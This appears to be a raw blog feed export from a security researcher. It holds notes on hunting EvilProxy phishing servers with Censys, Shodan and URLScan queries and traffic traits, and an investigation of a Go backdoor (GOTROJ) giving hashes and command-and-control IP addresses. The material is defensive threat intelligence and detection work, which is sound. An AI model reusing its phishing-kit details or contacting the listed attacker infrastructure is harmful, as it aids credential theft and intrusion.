href="https://blogger.googleusercontent.com/img/a/AVvXsEgHBeRHEQMMOtkLaK9wbipOko30qkgX0pA2PcpJoHUaRq18DmyWODj5WgdzgpUEChgCerPlmx6QAO0CjmpzVVEJmQtYIRJEDZJ6qhDEneXZJsXek-M5u2vxnn3Kjk4wVGUBJN5R6kPlgg1uesjBaR7cjCnFmXJSG1HsMeMOGyN1oyiNOa-cvDDOOBIl" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="240" data-original-width="459" height="230" src="https://blogger.googleusercontent.com/img/a/AVvXsEgHBeRHEQMMOtkLaK9wbipOko30qkgX0pA2PcpJoHUaRq18DmyWODj5WgdzgpUEChgCerPlmx6QAO0CjmpzVVEJmQtYIRJEDZJ6qhDEneXZJsXek-M5u2vxnn3Kjk4wVGUBJN5R6kPlgg1uesjBaR7cjCnFmXJSG1HsMeMOGyN1oyiNOa-cvDDOOBIl=w440-h230" width="440" /></a></div></div><br /><br /><div>Maybe we can look for servers being used for EvilProxy phishing sites by looking for "444 Unknown Status Code"?<p></p><p><b>Censys Query</b>: (services.http.response.status_code:444 and services.http.response.status_reason:"Unknown Status Code") and services.software.vendor=`nginx`</p><p><b>Shodan Query</b>: http.status:444 "Unknown Status Code" "nginx"</p><p><b>URLScan Query</b>: page.status:444 AND server:"nginx"</p>Shodan & Censys: out of 5 & 4 results, 2 IP's were publicly known for phishing.<div><br /></div><div>URLScan showed a ton of data and it's easy to tell from the domain & subdomain names which sites are phishing:</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjojsNkvRErnUMPlJ7Abdk-VcwBWLS9nZufhH1PgOLjKeFwVPd-V7vSYVMiURVjd7Mj37K7_WN7URbM-T1CsPS2eMpPaeS0kEOe0sR0Uibp73ytHefSqYiratYj8XKuYqoU24ZaGWEb4tbxvGmxDDXneS6BJvnKR1p_IwL08Fu-HeoakcUlMxvTzwUm" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1208" data-original-width="1200" height="405" src="https://blogger.googleusercontent.com/img/a/AVvXsEjojsNkvRErnUMPlJ7Abdk-VcwBWLS9nZufhH1PgOLjKeFwVPd-V7vSYVMiURVjd7Mj37K7_WN7URbM-T1CsPS2eMpPaeS0kEOe0sR0Uibp73ytHefSqYiratYj8XKuYqoU24ZaGWEb4tbxvGmxDDXneS6BJvnKR1p_IwL08Fu-HeoakcUlMxvTzwUm=w403-h405" width="403" /></a></div><br />The searching for 444 approach works fine but it doesn't seem to be too accurate when it comes to Shodan and Censys. It's much more useful when looking at URLScan though. </div><div><br /></div><div>Also, 444 doesn't show up for everything. It may have shown up for some of the domains due to misconfiguration possibly? i don't know.</div><h3 style="text-align: left;">Subdomain name:</h3><div>The other approach for looking for EvilProxy domains could be using subdomain names (with maybe additional queries). This will likely have false positives and since EvilProxy offers a lot of configuration options, if the user changed the default settings, you wouldn't have too much success.</div><div><br /></div><div>Some of the subdomain names EvilProxy has used are (based on VT & videos): lmo (microsoft), auth, login-live, wwwofc, accounts (google), mso (microsoft), github (github).</div><div><p></p><p>URLScan can be queried with: page.domain:(login-live.* OR accounts.* OR lmo.* OR auth.* OR wwwofc.* OR mso.* OR github.*) but github, auth, and accounts might lead to false positives.</p><p>This might be much better: page.domain:(login-live.* OR lmo.* OR wwwofc.* OR mso.*)</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgfIIx-f6gENYIWsL1vliZy4wSNh3Fv-LKDOWwu5OrCikB3Sl1KYrpRIL6tWRZzKGj_zpnkioFyxp9mRRVp0r-Lc9jFwnt99WViB9LgnWLUpwpWXVhdRyGrFJ1EIq6bUb_1G6RXEF2qaqqQrFX_5CaUTA_eSIXU1BTP9doiWHiPIMkAOFErLgy1QjBS" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1106" data-original-width="1326" height="330" src="https://blogger.googleusercontent.com/img/a/AVvXsEgfIIx-f6gENYIWsL1vliZy4wSNh3Fv-LKDOWwu5OrCikB3Sl1KYrpRIL6tWRZzKGj_zpnkioFyxp9mRRVp0r-Lc9jFwnt99WViB9LgnWLUpwpWXVhdRyGrFJ1EIq6bUb_1G6RXEF2qaqqQrFX_5CaUTA_eSIXU1BTP9doiWHiPIMkAOFErLgy1QjBS=w397-h330" width="397" /></a></div><br /><a href="http://Crt.sh">Crt.sh</a> can also be searched for certs issued for some of the subdomains, however, that may not work very well since it looks like in the past wildcard certs were issued.<p></p><h3 style="text-align: left;">URL parameters/pattern:</h3><p>One of the things we see above (in urlscan screenshot) is and in ThreatInsight/Proofpoint example is question mark '?' at the end of the URL. That could be searched for. Additionally, username= or eqp= can be searched for. Searching for /? and username= will lead to a lot of false positives. The search could be combined with some of the URLScan queries to potentially get less false positives.</p><p>URLScan query would look like this: page.url:"/?eqp=" NOT page.domain:ups.com</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg42Ap4MfGHKgmS9MP87XbMKhUYAQFQiB_SdyH0wxfMMPJMndFD3IwHyftOkUtYYr4L6_cfKAoGVZ1JZ6ghZh3b8AGW2jA9XfkWXTqTFPD0mP7EXNA_yovFdmKNt_sNOFTWG2usoRAWfxRMCwDwmOzAzDHb6GoD6CJUGfp-EmaBCOwH3SBKBNImlohr" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1424" data-original-width="842" height="433" src="https://blogger.googleusercontent.com/img/a/AVvXsEg42Ap4MfGHKgmS9MP87XbMKhUYAQFQiB_SdyH0wxfMMPJMndFD3IwHyftOkUtYYr4L6_cfKAoGVZ1JZ6ghZh3b8AGW2jA9XfkWXTqTFPD0mP7EXNA_yovFdmKNt_sNOFTWG2usoRAWfxRMCwDwmOzAzDHb6GoD6CJUGfp-EmaBCOwH3SBKBNImlohr=w256-h433" width="256" /></a></div><br />It kinda shows some malicious sites with some false positives. Also this search doesn't produce many results. At the time of writing, there were only 49 results.<p></p><p>Again, since EvilProxy is customizable, the parameters can be changed by the user. </p><h3 style="text-align: left;">Redirects:</h3><p>From the streams feature that was shown in the video, EvilProxy can perform actions such as redirect based on rules regarding the traffic source. Some of the defaults included brave.com, google.com and example.com. I'm sure other configuration settings include more redirections.</p><p>Only problem with this is, many sites might be doing these redirects, including other phishing kits so this doesn't mean source site is EvilProxy. The previous query for default subdomains can be combined to potentially get better results.</p><p>In URLScan this query provides results for any redirects to brave.com: page.redirected:off-domain AND ("brave.com") AND task.url:(login-live.* OR lmo.* OR wwwofc.* OR mso.*)</p><h3 style="text-align: left;">HTML Body:</h3><p>One of the things I noticed while doing the following query: page.redirected:off-domain AND page.domain:(login-live.* OR lmo.* OR wwwofc.* OR mso.*) is that some of the screenshots for malicious websites look like this:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjv7ndYwifvg7dxqWkEGO9NYFDIe2fqEL4XjwmNpGhGDBzJGzo9HWTiu4xmBGS7APNxow1Y5SUH4MYa_iLlbRoa_EOgNA5iuSV3kNMnG3-01ISMBRMOMfrgAgDTcJ6usv1jTDN36kKKwALMKhVGdnxtMoiUmFUB9d5zg0H7WfmGQQLMoef1kKgYV78B" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="360" data-original-width="1880" height="123" src="https://blogger.googleusercontent.com/img/a/AVvXsEjv7ndYwifvg7dxqWkEGO9NYFDIe2fqEL4XjwmNpGhGDBzJGzo9HWTiu4xmBGS7APNxow1Y5SUH4MYa_iLlbRoa_EOgNA5iuSV3kNMnG3-01ISMBRMOMfrgAgDTcJ6usv1jTDN36kKKwALMKhVGdnxtMoiUmFUB9d5zg0H7WfmGQQLMoef1kKgYV78B=w643-h123" width="643" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj-y1lh2LM_OB0C4n1Mcj7qCrLmRLj9twcV_Rz1vJLxQWzlb3wkseTxStd7FMVAHYDw_p8zGekNkD5YnUwbMVLTuw-rkRsu1KQB5reA80gl-NpYegj8cyUe-iUcr-l_z-AOgfgPQ4pq6PUJa5Jz-lE-zEwoG_j7JbhuHnPF2UYpcIh-NvdsyM1KN9OE" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="684" data-original-width="1474" height="222" src="https://blogger.googleusercontent.com/img/a/AVvXsEj-y1lh2LM_OB0C4n1Mcj7qCrLmRLj9twcV_Rz1vJLxQWzlb3wkseTxStd7FMVAHYDw_p8zGekNkD5YnUwbMVLTuw-rkRsu1KQB5reA80gl-NpYegj8cyUe-iUcr-l_z-AOgfgPQ4pq6PUJa5Jz-lE-zEwoG_j7JbhuHnPF2UYpcIh-NvdsyM1KN9OE=w480-h222" width="480" /></a></div><br /><p></p><p>This results from some javascript which can be found here: <a href="https://urlscan.io/responses/e85dcff15d140f96a949d9a186c44edb2723e90073bc902d5e278ecad0d1661a/">https://urlscan.io/responses/e85dcff15d140f96a949d9a186c44edb2723e90073bc902d5e278ecad0d1661a/</a> </p><p>I didn't spend too much time researching it but it looks like it may be trying to do fingerprinting. Some of the things in the javascript show up here: <a href="https://github.com/fingerprintjs/fingerprintjs/blob/master/src/sources/dom_blockers.ts">https://github.com/fingerprintjs/fingerprintjs/blob/master/src/sources/dom_blockers.ts</a> </p><p>Searching for javascript code that does fingerprinting in network traffic or on URLScan might be useful for hunting, however, I'd assume other people are using javascript to fingerprint so it might not always be useful.</p><p>The code kinda looks like this:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgaYxMs6VykskkII7JMFw-o2gFIACvilaH3jDu3Cv-rwX_OknB3wsZSrdFEqap3kuYrG0YHQ7IHg7SPkX4YIdmZUY-9i0XIhpnWl22ClKtFUqlzf38yGSSQUmVAHDvN2TspxDGJdpQQ8Ue83PRHtshBXaVVaI_PdVPAfhDnBadSZX7ugaiAv8PeKBLO" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="252" data-original-width="606" height="133" src="https://blogger.googleusercontent.com/img/a/AVvXsEgaYxMs6VykskkII7JMFw-o2gFIACvilaH3jDu3Cv-rwX_OknB3wsZSrdFEqap3kuYrG0YHQ7IHg7SPkX4YIdmZUY-9i0XIhpnWl22ClKtFUqlzf38yGSSQUmVAHDvN2TspxDGJdpQQ8Ue83PRHtshBXaVVaI_PdVPAfhDnBadSZX7ugaiAv8PeKBLO" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjwIL7KYTY9HBZnfpf8Q0qZ_ao6UR9TknDV8WpxPzci3UrpRfqpIC47z1q4TQu6FgURExkEU7txg_wXFscZExymcwh0K9mmSRsHiUMd5ZZt-l6fh-YJ5SNeErDw-rK_u50eOhTQe8_DcJA8THKlj_6LE4uqgnfb3EZ_di2WZZXvMNaJXhtftBxDTbBV" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="192" data-original-width="570" height="108" src="https://blogger.googleusercontent.com/img/a/AVvXsEjwIL7KYTY9HBZnfpf8Q0qZ_ao6UR9TknDV8WpxPzci3UrpRfqpIC47z1q4TQu6FgURExkEU7txg_wXFscZExymcwh0K9mmSRsHiUMd5ZZt-l6fh-YJ5SNeErDw-rK_u50eOhTQe8_DcJA8THKlj_6LE4uqgnfb3EZ_di2WZZXvMNaJXhtftBxDTbBV" width="320" /></a></div><br />Essentially, it's title Wait... /title, script big_js_block /script, script let randomvar = base64 /script<p></p><p>Regex rule applied to http traffic might be able to find this maybe?</p><h3 style="text-align: left;">HTTP Requests:</h3><p>While doing research/queries, I found a website that was not doing any redirection and is possibly EvilProxy (getting 444 on one of the pages related to this).</p><p>Traffic to this site shows the following POST request after fingerprinting:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEify2hnKR8ckZVmMqEK4OOExPscWR_I7C2kVDDT2yydNkVSEV18xLM2Uya-QwN245kIgd3SjrkgavKbsoPtQeLxKXKpK6g_gINQ91PKqe9E1SqiMt2nfvdRH0r4AGn3KYYAaJ5qdlf1xXnMYOiOnHahB8QsZVsBnkmyYjC-UN-WM7Bco9bmN3QzC0lx" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="762" data-original-width="2560" height="229" src="https://blogger.googleusercontent.com/img/a/AVvXsEify2hnKR8ckZVmMqEK4OOExPscWR_I7C2kVDDT2yydNkVSEV18xLM2Uya-QwN245kIgd3SjrkgavKbsoPtQeLxKXKpK6g_gINQ91PKqe9E1SqiMt2nfvdRH0r4AGn3KYYAaJ5qdlf1xXnMYOiOnHahB8QsZVsBnkmyYjC-UN-WM7Bco9bmN3QzC0lx=w770-h229" width="770" /></a></div><br />The response looks like this:</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiX6w_9WrWr2BkLzovCoPKYR_JtBXkJrVI4iTmA5MTIL0Jb0cJMbjml4zXot9jul1fOPtuJYgMDZVjK4qztXcCYDpUubG75dPJJsAqosOCc7mZGvtG7eXu0B1FTWwOfHVoBFmbBU1XJrQ9DTX8V6A74yDGLSPiC5iIhtI8Eld7PBdXsr0TZro2PhtM9" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="440" data-original-width="594" height="237" src="https://blogger.googleusercontent.com/img/a/AVvXsEiX6w_9WrWr2BkLzovCoPKYR_JtBXkJrVI4iTmA5MTIL0Jb0cJMbjml4zXot9jul1fOPtuJYgMDZVjK4qztXcCYDpUubG75dPJJsAqosOCc7mZGvtG7eXu0B1FTWwOfHVoBFmbBU1XJrQ9DTX8V6A74yDGLSPiC5iIhtI8Eld7PBdXsr0TZro2PhtM9" width="320" /></a></div><br />Once that's done, a cookie with cookiekey:cookievalue get's added to the session.</div><div><br /></div><div>There is also a websocket connection/heartbeat, which doesn't happen with real microsoft login page:</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiQW_fV3ZqnPwuM4mU9zDMoOYIo_4JVFh9FrR4Y0SKrAcM3CvWHiF4vWQGrit2qL6I7COeiZ6EHFv2qAoN3D-T_dkDjUsi1y4IpvaT8CdkwyXlKyNEwymK6iXz-OyBiYdwYLcNqeTM8Np4fuZg0rJ1aVdNnMh_wsu2mjNhQoJONFcL8N7GsUQG28A8q" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="470" data-original-width="418" height="240" src="https://blogger.googleusercontent.com/img/a/AVvXsEiQW_fV3ZqnPwuM4mU9zDMoOYIo_4JVFh9FrR4Y0SKrAcM3CvWHiF4vWQGrit2qL6I7COeiZ6EHFv2qAoN3D-T_dkDjUsi1y4IpvaT8CdkwyXlKyNEwymK6iXz-OyBiYdwYLcNqeTM8Np4fuZg0rJ1aVdNnMh_wsu2mjNhQoJONFcL8N7GsUQG28A8q" width="213" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj7p25q6QNVz9a6QUgzKjpYkW1pqLMPoRoH9XsYA1gLqZtjDNhJvqh6BQa5TBHcyUP3y2DZ6X-cET_X75QBnUTawLNQ1NeV4CxRxrHQmTQwfD7qyqwxJF-C6uDuLH0qbgXJTQAUPACZCftAw_WOuRIm0ZZmfEQ-1waw-NFpp6EYcLUgS7MDri5aGWn8" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="786" data-original-width="834" height="336" src="https://blogger.googleusercontent.com/img/a/AVvXsEj7p25q6QNVz9a6QUgzKjpYkW1pqLMPoRoH9XsYA1gLqZtjDNhJvqh6BQa5TBHcyUP3y2DZ6X-cET_X75QBnUTawLNQ1NeV4CxRxrHQmTQwfD7qyqwxJF-C6uDuLH0qbgXJTQAUPACZCftAw_WOuRIm0ZZmfEQ-1waw-NFpp6EYcLUgS7MDri5aGWn8=w357-h336" width="357" /></a></div><br /><br /><p></p><p>The request for sending username/password look identical for the phishing site and normal login site.</p><p>websocket, fingerprinting POST, and response with cookies might be something that can be detected on wire if TLS/SSL interception and suricata/zeek monitoring is in place.</p><p><br /></p><h3 style="text-align: left;">Conclusion:</h3><p>EvilProxy offers a lot of customization so a lot of stuff mentioned above can be modified the by user but some users might just use default settings. </p><p>Without a lot of attribution directly to EvilProxy and research out there, a lot of the stuff above is just an educated guess with the information I have available. I could be wrong about a lot of things. These are just notes and not anything conclusive.</p><h2 style="text-align: left;"><b>Links:</b></h2><p><a href="https://resecurity.com/blog/article/evilproxy-phishing-as-a-service-with-mfa-bypass-emerged-in-dark-web">https://resecurity.com/blog/article/evilproxy-phishing-as-a-service-with-mfa-bypass-emerged-in-dark-web</a></p><p><a href="https://twitter.com/JeffreyAppel7/status/1591911982848172032/photo/1">https://twitter.com/JeffreyAppel7/status/1591911982848172032/photo/1</a></p><p><a href="https://www.microsoft.com/en-us/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/">https://www.microsoft.com/en-us/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/</a></p><p><a href="https://github.com/kgretzky/evilginx2">https://github.com/kgretzky/evilginx2</a></p><p><a href="https://github.com/drk1wi/Modlishka">https://github.com/drk1wi/Modlishka</a></p><p><a href="https://github.com/muraenateam/muraena">https://github.com/muraenateam/muraena</a></p><p><br /></p><p><b><br /></b></p></div></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-25392070837454202342022-10-17T08:11:00.006-07:002022-10-17T08:12:49.173-07:00Researching golang malware and how I hate security industry naming conventions - Part 1<p> </p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjCacg8gei_TGJ0rWC9cFDLmBEhe8kudSjrikgKNiq9LgHgG0r1RZYbYmBXcnp0R0l7-GVKXPZ31-swOD2ZIxwjuY2Kr4OrDMqtDNdFq12nYhLzcoqMSj0rxv2PkRj7Bvtir1gZPT45Dd90CtMliYG_fRvEsTzmJc9KuvHDFYG6v3bMO4_1TQSt-KhL" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="768" data-original-width="1024" height="300" src="https://blogger.googleusercontent.com/img/a/AVvXsEjCacg8gei_TGJ0rWC9cFDLmBEhe8kudSjrikgKNiq9LgHgG0r1RZYbYmBXcnp0R0l7-GVKXPZ31-swOD2ZIxwjuY2Kr4OrDMqtDNdFq12nYhLzcoqMSj0rxv2PkRj7Bvtir1gZPT45Dd90CtMliYG_fRvEsTzmJc9KuvHDFYG6v3bMO4_1TQSt-KhL=w400-h300" width="400" /></a></div><br /><p></p>While doing some research on the use of golang in malware, I came across this golang sample here: <a href="https://www.virustotal.com/gui/file/020f6b3e045fa6b968226a8f2b2800dc55c65e842607d04d68b47ef4d18b0eee/detection">https://www.virustotal.com/gui/file/020f6b3e045fa6b968226a8f2b2800dc55c65e842607d04d68b47ef4d18b0eee/detection </a><br />At the time of writing this, it has 3/72 detections.<br /><br />It's named winnta.exe<br />MD5 7e17c9e4ebe61e43966e9f65e334727e<br />SHA-1 2172901d2a13304dd53a83e518fd5be84ed9ec08<br />SHA-256 020f6b3e045fa6b968226a8f2b2800dc55c65e842607d04d68b47ef4d18b0eee<br /><br />Here are the results for yara scan: <a href="https://yaraify.abuse.ch/sample/020f6b3e045fa6b968226a8f2b2800dc55c65e842607d04d68b47ef4d18b0eee/">https://yaraify.abuse.ch/sample/020f6b3e045fa6b968226a8f2b2800dc55c65e842607d04d68b47ef4d18b0eee/</a><br /><br />It connects to 195.149.87[.]87:443 (<a href="https://www.virustotal.com/gui/ip-address/195.149.87.87/relations">https://www.virustotal.com/gui/ip-address/195.149.87.87/relations</a> )<br /><br />The data above doesn't really tell us much about the sample. <br /><br />Running strings on the sample is kinda interesting, it shows the following:<br />-ldflags="-s -w -extldflags '-static' -X main.name=WindowsNTApp -X main.addr=195.149.87.87:443 -X main.service=WindowsNTApp"<br /><br />Also there are a bunch of references to go files and code in this directory: "/home/builder18g/goroot/" for example:<br />/home/builder18g/goroot/src/c/gsh/main/main.go<br />/home/builder18g/goroot/src/c/gsh/main/windows.go<br /><br />Looking for 'main.' shows the following:<br />runtime.main.func1<br />runtime.main.func2<br />main.main<br />main.(*winService).Stop<br />main.(*winService).Execute<br />main.(*winService).Start<br />main.(*winService).Execute.func1<br />main.startInteractive<br />main.Start<br /><br />At this point, assumption is this is some kinda backdoor.<br /><br />Researching the C2 IP, I found this:<br /><a href="https://raw.githubusercontent.com/stamparm/maltrail/master/trails/static/malware/apt_unc961.txt">https://raw.githubusercontent.com/stamparm/maltrail/master/trails/static/malware/apt_unc961.txt<br /></a><a href="https://otx.alienvault.com/pulse/6244606893ddbc9a6a5bbdeb">https://otx.alienvault.com/pulse/6244606893ddbc9a6a5bbdeb<br /></a><a href="https://www.mandiant.com/resources/blog/mobileiron-log4shell-exploitation">https://www.mandiant.com/resources/blog/mobileiron-log4shell-exploitation<br /></a><br />Here's what Mandiant has to say about this:<br />"UNC961 deployed two previously unobserved backdoors: HOLEDOOR and DARKDOOR. HOLEDOOR is written in C, whereas DARKDOOR is written in Go."<br /><br />"DARKDOOR is a backdoor written in Go that is highly modular in design. It supports communication over TLS and HTTP. It has capabilities to execute arbitrary code and list running processes."<br /><br />I continued to do more research to see what else I can find out about this sample doing any reverse engineering.<br /><br />Searching for winnta.exe results in a paper from SentinelOne (<a href="https://www.sentinelone.com/wp-content/uploads/2021/05/Watchtower_2021_May_White.pdf">https://www.sentinelone.com/wp-content/uploads/2021/05/Watchtower_2021_May_White.pdf</a>)<br /><br />They mention the backdoor under section "Mercenary APT Groups Targeting the Financial Services Industry"<br /><br />Here's what they had to say about it:<br />File: winntaWindows EXE written in golang that calls out to<br />45.76.236[.]136:443<br />Backdoor functionality<br />Potential name “gsh”<br /><br />File: main<br />Golang compiled EXE of same “gsh” family as mentioned<br />for winnta<br />Calls out to 198.199.104[.]97:443 and has backdoor<br />capabilities<br /><br />Under potential attribution section, they refer to an RSA report regarding Carbanak."Carbanak has been reported using a custom golang backdoor named GOTROJ. This backdoor<br />has code overlap and functionality similar to the “geodezine” backdoor discovered in the attacker’s toolkit. "<br /><br />The RSA paper "The Shadows of Ghosts" can be found here: <a href="https://www.netwitness.com/wp-content/uploads/2021/12/the-shadows-of-ghosts-carbanak-report.pdf">https://www.netwitness.com/wp-content/uploads/2021/12/the-shadows-of-ghosts-carbanak-report.pdf</a><br /><br />Here's a snippet about GOTROJ from the paper:<br />"On D+30, the attackers installed a Windows Trojan, written in Go, as a Windows<br />Service on one of the two primary Active Directory Domain Controllers. They<br />would move to utilizing the GOTROJ as their primary method of ingress for the<br />duration of the engagement. The GOTROJ Trojan communicated with C2 IP<br />address 107.181.246.146 over TCP/443 for its remote access channel."<br /><br />I continued doing more research. I searched for "WindowsNTApp" service, which came up with a crowdstrike report on ProphetSpider. The report is here: <a href="https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/">https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/</a><div><br />They also refer to the malware as GOTROJ. This is what they say:<br />"The adversary commonly creates Windows services, e.g. WindowsNTApp for GOTROJ, to establish persistence for downloaded malware."</div><div><br /></div><div>I finally searched for GOTROJ to see if there is anything else I can find. I only found one article here (besides ones I already looked at): <a href="https://www.fortify24x7.com/2022/04/ragnarlocker-ransomware-iocs/">https://www.fortify24x7.com/2022/04/ragnarlocker-ransomware-iocs/</a> where they found GOTROJ along side with Ragnarlocker infection.</div><div><br /></div><div>I downloaded some of the samples to look at. I recommend this Ghidra extension: <a href="https://github.com/mooncat-greenpy/Ghidra_GolangAnalyzerExtension/releases/tag/1.1.0">https://github.com/mooncat-greenpy/Ghidra_GolangAnalyzerExtension/releases/tag/1.1.0</a></div><div><br /></div><div>The samples look similar and functions kinda look like this (different samples will have slightly different names and code):</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj4lWWGHwW021JKUsurrHt2dyM1vqilco7RwJ_jXEVirG3Fxzie6n6DN3MUPM7fyeYWFpzeOKGg0nKPvQbXgzNCoVkDo4A8U68hSa1ad7RaXISaZxMnFNUZ9iiq4gH6GI8YhjmxWRvIBmT2xWKBQbzheoGAM4ExVtN4mH-fAKvBn_aaj6pgEix5szB4" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="1002" data-original-width="820" height="640" src="https://blogger.googleusercontent.com/img/a/AVvXsEj4lWWGHwW021JKUsurrHt2dyM1vqilco7RwJ_jXEVirG3Fxzie6n6DN3MUPM7fyeYWFpzeOKGg0nKPvQbXgzNCoVkDo4A8U68hSa1ad7RaXISaZxMnFNUZ9iiq4gH6GI8YhjmxWRvIBmT2xWKBQbzheoGAM4ExVtN4mH-fAKvBn_aaj6pgEix5szB4=w523-h640" width="523" /></a></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhwQYfbdPRufyuBHe4g2I0kbN0COU-n1GUjd03dc8qjgl-rDu_D6uj2vnFu9StwUx7tFxIidqyb4Q6y5Q4U9R6FRC4G3jzZ0oLsKDprEQBzLIilrNzwLK1oEeRZWL0HFACZImxRsTslPqeOTqBZbOPwU4nm7nKIimmimrLC5ABwjnPPJA2NtyGUXmKL" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="1268" data-original-width="944" height="640" src="https://blogger.googleusercontent.com/img/a/AVvXsEhwQYfbdPRufyuBHe4g2I0kbN0COU-n1GUjd03dc8qjgl-rDu_D6uj2vnFu9StwUx7tFxIidqyb4Q6y5Q4U9R6FRC4G3jzZ0oLsKDprEQBzLIilrNzwLK1oEeRZWL0HFACZImxRsTslPqeOTqBZbOPwU4nm7nKIimmimrLC5ABwjnPPJA2NtyGUXmKL=w477-h640" width="477" /></a></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiOW08agJ6-tAV0_HfZzJj0H4C9zyFvMtgqJ5mJlJBtEzJHQYZtdY7DSmj0SHnQ4L28C_dxQKBI20mwhEplSsAP7SHtQtAOYbmwvasS88xhpWNQ9_9P26n1XgoZW5M6NqUrSh8Gvvwnn7oV6q1f6R_xqxmq72icCaR0WT04_tepjzpa2MpUkP4Y-3TX" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="1164" data-original-width="926" height="640" src="https://blogger.googleusercontent.com/img/a/AVvXsEiOW08agJ6-tAV0_HfZzJj0H4C9zyFvMtgqJ5mJlJBtEzJHQYZtdY7DSmj0SHnQ4L28C_dxQKBI20mwhEplSsAP7SHtQtAOYbmwvasS88xhpWNQ9_9P26n1XgoZW5M6NqUrSh8Gvvwnn7oV6q1f6R_xqxmq72icCaR0WT04_tepjzpa2MpUkP4Y-3TX=w509-h640" width="509" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjciSXz_946EHIDZiZK5RrJ-H4LyEkLonkEDiz60__0-ZtQzRINhJVLc423Jf_n8u812_nlOm3bxnw5XYVDkycgZWE7k1JTxzIjDE2kF3VqMeITQIgjepjQ8HG373yhTlgF4thdDZo-ZwIKw1g8MaQ21Ci8SgtJSY_jXcBwPqTnYVvdHKtPzbHB2w0y" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="454" data-original-width="978" height="298" src="https://blogger.googleusercontent.com/img/a/AVvXsEjciSXz_946EHIDZiZK5RrJ-H4LyEkLonkEDiz60__0-ZtQzRINhJVLc423Jf_n8u812_nlOm3bxnw5XYVDkycgZWE7k1JTxzIjDE2kF3VqMeITQIgjepjQ8HG373yhTlgF4thdDZo-ZwIKw1g8MaQ21Ci8SgtJSY_jXcBwPqTnYVvdHKtPzbHB2w0y=w640-h298" width="640" /></a></div><br /><br /></div><div style="text-align: left;">The golang build path's embedded inside the samples are different, likely because each sample was probably compiled on different hosts likely by different people. Interestingly, the sample I started with is the only sample that has the build string in it with ldflags.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Other reports have already analyzed the capabilities of this golang backdoor but you can see from the function names what it can do as well.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Part 1: <a href="https://www.boredhackerblog.info/2022/10/researching-golang-malware-and-how-i.html">https://www.boredhackerblog.info/2022/10/researching-golang-malware-and-how-i.html</a></div><div style="text-align: left;">Part 2: <a href="https://www.boredhackerblog.info/2022/10/researching-golang-malware-and-how-i_17.html">https://www.boredhackerblog.info/2022/10/researching-golang-malware-and-how-i_17.html</a></div></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-7045690219207760912022-10-17T08:11:00.005-07:002022-10-17T08:12:46.068-07:00Researching golang malware and how I hate security industry naming conventions - Part 2<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi38UN9r00fTukaF1pjS-RuRDbAlD-IOf-0cBn2dH2Mez85uBM7AuQYIxhoDu4cfMR1dnprpP4gOAXpXNhjX4lkgbyRrJjGk3NM8v1EoH1jRxrf0jX0h8B6sTR0t9NHpevvnASsN6ZswKZsJ6LGKAVT4WXZ9o90MNMfYT4PK3zR28gq59BIddX07Gmw" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="300" data-original-width="400" height="300" 